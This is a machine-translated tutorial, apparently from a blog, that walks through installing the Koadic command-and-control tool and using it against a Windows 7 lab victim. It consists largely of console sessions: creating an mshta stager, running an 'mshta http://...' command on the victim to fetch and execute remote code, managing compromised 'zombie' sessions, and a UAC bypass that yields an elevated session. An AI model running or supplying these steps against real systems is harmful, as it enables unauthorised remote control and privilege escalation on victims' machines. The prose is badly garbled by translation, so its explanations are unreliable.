Koadic installation and use
Outline
Koadic DEFCON is typing out after a penetration tool, mainly for most operations through vbscript, jscript
ado start demo
Preparing the Environment
I was ready two virtual machines to attack a machine kali is
a windows7 64 bits are the victims of
installation
Installation is very simple git clone https://github.com/zerosum0x0/koadic.git
to install after-dependentcd koadic/pip install -r requirements.txt
use
run./koadic
.
/ \
_ _ | |
| | _____ __ _ __| || | ___
| |/ / _ \ / _` |/ _` ||.| / __|
| / (o) | (_| | (_| ||.|| (__
|_|\_\_^_/ \__,_|\__,_||:| \___|
|:|
~\==8==/~
8
O
-{ COM Command & Control }-
Windows Post-Exploitation Tools
Endless Intellect
~[ Version: 0x8 ]~
~[ Stagers: 4 ]~
~[ Implants: 29 ]~
(koadic: sta/js/mshta)#
First we have to know a few concepts of this tool
- Stagers is the kind generated on your machine payload of attack
- Operating Implants is that when you can control the machine
Specific Implants Stagers and you can see it's github pagehttps://github.com/zerosum0x0/koadic
Then we perform use stager/js/mshta
is to use mshta the stager
settings of the machine after the port and ip, local monitor
you can type info command to display the parameters to be set set LHOST 192.168.1.104set LPORT 9999
and then runrun
(koadic: sta/js/mshta)# run
[+] Spawned a stager at http://192.168.1.104:9999/BYhBU
[>] mshta http://192.168.1.104:9999/BYhBU
Because the penetration tool, so anyway you can certainly execute a command on the computer you control
executed on the victim machine mshta http://192.168.1.104:9999/BYhBU
my words directly open a cmd perform just fine
and then there will be a pit python character, there will be the following this wrong
(koadic: sta/js/mshta)# ----------------------------------------
Exception happened during processing of request from ('192.168.1.110', 49159)
Traceback (most recent call last):
File "/usr/lib/python2.7/SocketServer.py", line 596, in process_request_thread
self.finish_request(request, client_address)
File "/usr/lib/python2.7/SocketServer.py", line 331, in finish_request self.RequestHandlerClass(request, client_address, self) File "/usr/lib/python2.7/SocketServer.py", line 652, in __init__ self.handle() File "/root/koadic/core/handler.py", line 90, in handle return BaseHTTPRequestHandler.handle(self) File "/usr/lib/python2.7/BaseHTTPServer.py", line 340, in handle self.handle_one_request() File "/usr/lib/python2.7/BaseHTTPServer.py", line 328, in handle_one_request method() File "/root/koadic/core/handler.py", line 169, in do_POST self.session.parse_user_info(data) File "/root/koadic/core/session.py", line 56, in parse_user_info data = data.decode().split("~~~") UnicodeDecodeError: 'ascii' codec can't decode byte 0xe4 in position 65: ordinal not in range(128) ---------------------------------------- [!] Zombie 0: Timed out. The following is the error UnicodeDecodeError: 'ascii' codec can't decode byte 0xe4 in position 65: ordinal not in range(128)
you just replace the utf-8 character encoding like
how to do it look at the following
exit it first
opens the following filevim koadic
Add on
import sys
reload(sys)
sys.setdefaultencoding('utf-8')
The total of the file looks like this
#!/usr/bin/env python
import sys
reload(sys)
sys.setdefaultencoding('utf-8')
# Copyright (c) 2016 - 2017 RiskSense, Inc.
# # Licensed under the Apache License, Version 2.0 (the "License"); you may not # use the software except in compliance with the License. # # You may obtain a copy of the License at: # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations under # the License. # Disclaimer: # Usage of Koadic for attacking targets without prior mutual consent is illegal. # It is the end user's responsibility to obey all applicable local, state, # federal, and international laws. Developers assume no liability and are not # responsible for any misuse or damage caused by this program. __version_info__ = (0, 8) __version__ = "x".join(map(str, __version_info__)) __license__ = "Apache 2.0" __credits__ = ["zerosum0x0", "jmage", "TheNaterz", "aleph-naught-"] if __name__ == "__main__": import core.shell banner = open("data/banner.txt", "rb").read().decode("unicode_escape") shell = core.shell.Shell(banner, __version__) shell.run() After re-above operations are not being given a
.
/ \
_ _ | |
| | _____ __ _ __| || | ___
| |/ / _ \ / _` |/ _` ||.| / __|
| / (o) | (_| | (_| ||.|| (__
|_|\_\_^_/ \__,_|\__,_||:| \___|
|:|
~\==8==/~
8
O
-{ COM Command & Control }-
Windows Post-Exploitation Tools
Endless Intellect
~[ Version: 0x8 ]~
~[ Stagers: 4 ]~
~[ Implants: 29 ]~
(koadic: sta/js/mshta)# use stager/js/mshta
(koadic: sta/js/mshta)# set LHOST 192.168.1.104
[+] LHOST => 192.168.1.104
(koadic: sta/js/mshta)# run
[+] Spawned a stager at http://192.168.1.104:9999/N435X
[>] mshta http://192.168.1.104:9999/N435X
[+] Zombie 0: Staging new connection (192.168.1.110)
[+] Zombie 0: WIN-HK90RUM6L1B\bboysoul @ WIN-HK90RUM6L1B -- Microsoft Windows 7 专业版
(koadic: sta/js/mshta)#
After our privilege elevation is uac bypass
Enter the zombies to see our machine control
(koadic: sta/js/mshta)# zombies
ID IP STATUS LAST SEEN
--- --------- ------- ------------
0 192.168.1.110 Alive 2017-11-25 21:27:46
Use "zombies ID" for detailed information about a session.
Input zombies 0can view the details of the machine
(koadic: sta/js/mshta)# zombies 0
ID: 0
Status: Alive
Last Seen: 2017-11-25 21:28:42
IP: 192.168.1.110
User: WIN-HK90RUM6L1B\bboysoul
Hostname: WIN-HK90RUM6L1B
Primary DC: Unknown
OS: Microsoft Windows 7 专业版
OSArch: 64-bit
Elevated: No
User Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Session Key: f4d7735b8a9d45a5a74ed5a63a164421
JOB NAME STATUS ERRNO
---- --------- ------- -------
Here you can see Elevated show no representation we did not mention the right to
enter use implant/elevate/bypassuac_eventvwr
information look at this module
(koadic: imp/ele/bypassuac_eventvwr)# info
NAME VALUE REQ DESCRIPTION
----- ------------ ---- -------------
PAYLOAD yes run payloads for a list
ZOMBIE ALL yes the zombie to target
Here we payload and zombie is set to 0, the payload is expressed as 0 is not used, zombie numbers is 0
then run just fine
(koadic: imp/ele/bypassuac_eventvwr)# run
[*] Zombie 0: Job 16 (implant/elevate/bypassuac_eventvwr) created.
[+] Zombie 0: Job 16 (implant/elevate/bypassuac_eventvwr) completed.
[+] Zombie 1: Staging new connection (192.168.1.110)
[+] Zombie 1: WIN-HK90RUM6L1B\bboysoul* @ WIN-HK90RUM6L1B -- Microsoft Windows 7 专业版
Success
but noted that the program established a new link to bypass it turned out that the zombie connection Although there but still no mention rights of users, the new that connection is conducted to mention right off the user, do not believe the input zombie look is not much out of a link
(koadic: imp/ele/bypassuac_eventvwr)# zombies
ID IP STATUS LAST SEEN
--- --------- ------- ------------
0 192.168.1.110 Alive 2017-11-25 21:43:00
1* 192.168.1.110 Alive 2017-11-25 21:43:00
Use "zombies ID" for detailed information about a session.
Look at the information zombie 1
(koadic: imp/ele/bypassuac_eventvwr)# zombies 1
ID: 1
Status: Alive
Last Seen: 2017-11-25 21:45:35
IP: 192.168.1.110
User: WIN-HK90RUM6L1B\bboysoul*
Hostname: WIN-HK90RUM6L1B
Primary DC: Unknown
OS: Microsoft Windows 7 专业版
OSArch: 64-bit
Elevated: YES!
User Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Session Key: c42dec18786a47f2bc4ee023dc8f69bd
JOB NAME STATUS ERRNO
---- --------- ------- -------
Is right to mention the success of
their own research provide the right machine after a successful implant in all the modules we can use specific modules of it